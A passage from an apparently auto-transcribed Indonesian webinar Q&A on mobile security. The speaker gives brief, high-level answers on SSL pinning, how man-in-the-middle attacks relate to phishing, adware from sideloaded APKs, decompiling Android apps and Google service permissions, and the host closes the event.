supaya nggak bisa dibaca traffic HTTP? Sebenarnya bukan nggak bisa sih, intinya mempersulit gitu kan. Nah, ini jadi caranya itu adalah kita tuh pasang SSL pinning gitu. Sebenarnya SSL pinning itu bisa bypass, bisa diakalin gitu kan. Cuma untuk dengan ada SSL pinning tuh setidaknya bikin effort untuk attacker supaya dia itu bisa supaya dia bisa mempelajari gitu. Dia itu kalau mau mempelajarin aplikasi kita itu harus effort banget gitu kan. Kurang lebih gitu ya. Jadi kesimpulannya pakai SSL pinning gitu ya. Untuk jawaban dari untuk pertanyaan dari Mas Harung. Oke, semoga terjawab pertanyaannya, Mas. Ada yang terlewat sedikit, Mas Viku bertanya lagi, apa sih perbedaan phishing dengan MITIM proxy? Kalau untuk phishing itu ya, kalau kalau untuk phishing itu sebenarnya kalau untuk intinya man in the middle itu kita bisa training ke phishing gitu. Contohnya itu misalnya ethercap ya. Ethercap itu misalnya ethercap itu bisa pas kita buka alamat XYZ itu kan, nanti kebuka phishing. Jadi intinya itu adalah apa gitu kan? Phishing itu bisa disambungin dengan yang namanya man in the middle gitu kan, kurang lebih begitu sih. Man in the middle itu tekniknya, terus phishing itu bisa disatuin sama MITM itu. Baik, terima kasih jawabannya, Mas. Semoga terjawab pertanyaannya.
Next question, Mas Haji Pratama bertanya, kenapa ya HP kita tiba-tiba ada iklan yang suka mengganggu? Apa karena buka sebuah link atau apa bisa karena APK tertentu? Nah, bagaimana Mas Raffi penjelasannya? HP kita masih tiba-tiba suka ada iklan. Nah, kalau karena suka ada iklan, bisa jadi karena kita itu install APK sih, bisa jadi dari suatu aplikasi gitu kan, dari suatu aplikasi misalnya kita itu nggak terlalu lihat permissionnya sih, bisa jadi kita install aplikasi dari mana gitu, nah itu mengandung iklan, itu ada namanya itu adware. Jadi dari APK itu pasti itu nggak mungkin dari di Android-nya. Berarti dari link tidak ada potensi untuk mengganggu masuknya iklan seperti itu ya Mas? Ordering mungkin juga sih, sebenarnya banyak kok kemungkinannya itu. Jadi intinya itu kenapa di HP tiba-tiba iklan ya, pasti dia itu mungkin nge-install aplikasi gitu, install aplikasi dari mana, nah itu ada ininya, ada iklannya dari situ. Lebih gitu, Mas. Oke. Terima kasih atas jawabannya Mas. Kita akan next question dari Mas Reksa. Mas, mau decompiler aplikasi Android itu cuma berlaku untuk Android pakai bahasa Java atau Kotlin? Kalau Flutter atau React Native itu apakah juga bisa di decompiler ke Java decompiler juga kah? Kalau yang Flutter atau native itu, kalau misalnya setahu saya itu APK itu tetap ini sih, APK itu tetap zip. Jadi karena APK itu tetap zip, intinya sih masih bisa dibongkar gitu. Walaupun misalnya beda bahasa, mungkin ada teknik lain juga yang kalau misalnya Java itu pakai Java compiler, nanti kalau misalnya React Native ada lagi di compiler, saya belum research juga sih tentang React Native, tapi intinya itu yang harus kita pahamin adalah si APK itu cuma file zip gitu. Jadi intinya nggak ada APK yang aman lah, intinya bisa dibongkar pasti. Oke, mungkin untuk keterbatasan waktu kita satu pertanyaan lagi kali ya Mas ya. Dari Mas Viko, Google Service di smartphone itu apakah bahaya karena permission yang dia allow secara otomatis saatlah bermacam-macam? Kalau untuk Google Service di smartphone, kalau misalkan dari company yang besar gitu, misalnya kayak dari resmi dari Google atau dari misalnya resmi dari Google atau nggak resmi dari smartphone-nya, harusnya nggak masalah sih, walaupun misalnya dia bisa macam-macam, tapi setidaknya bukan apa sih, maksudnya intinya kalau dari resmi itu nggak masalah gitu, nggak kenapa-napa, yang masalah itu kalau nggak resmi gitu, intinya begitu aja. Oke, terima kasih Mas atas pemaparan. Oke, tiba di ujung acara teman-teman semua. Terima kasih atas partisipannya mengikuti event kegiatan hari ini. Sebelumnya saya mau menginformasikan bahwa kita masih berkolaborasi untuk 2 kelas selanjutnya di tanggal 23 Januari. Nanti silakan untuk teman-teman yang ingin mengikuti acara tersebut, linknya bisa di follow terus IG di Lubokasi dan juga IG di SAI. Nah, teman-teman untuk sedikit informasi juga untuk teman-teman yang daftar di Webdilo bisa langsung saja unduh sertifikatnya di profil masing-masing webdilo.id. Oke, sekian saja teman-teman dari saya. Terima kasih atas partisipasinya sekali lagi, dan juga terima kasih untuk Mas Raffi dan Mawan untuk ilmunya. Semoga ilmunya bermanfaat bagi teman-teman semua. Saya Abizair pamit undur diri. Assalamualaikum warahmatullahi wabarakatuh. Warahmatullahi wabarakatuh.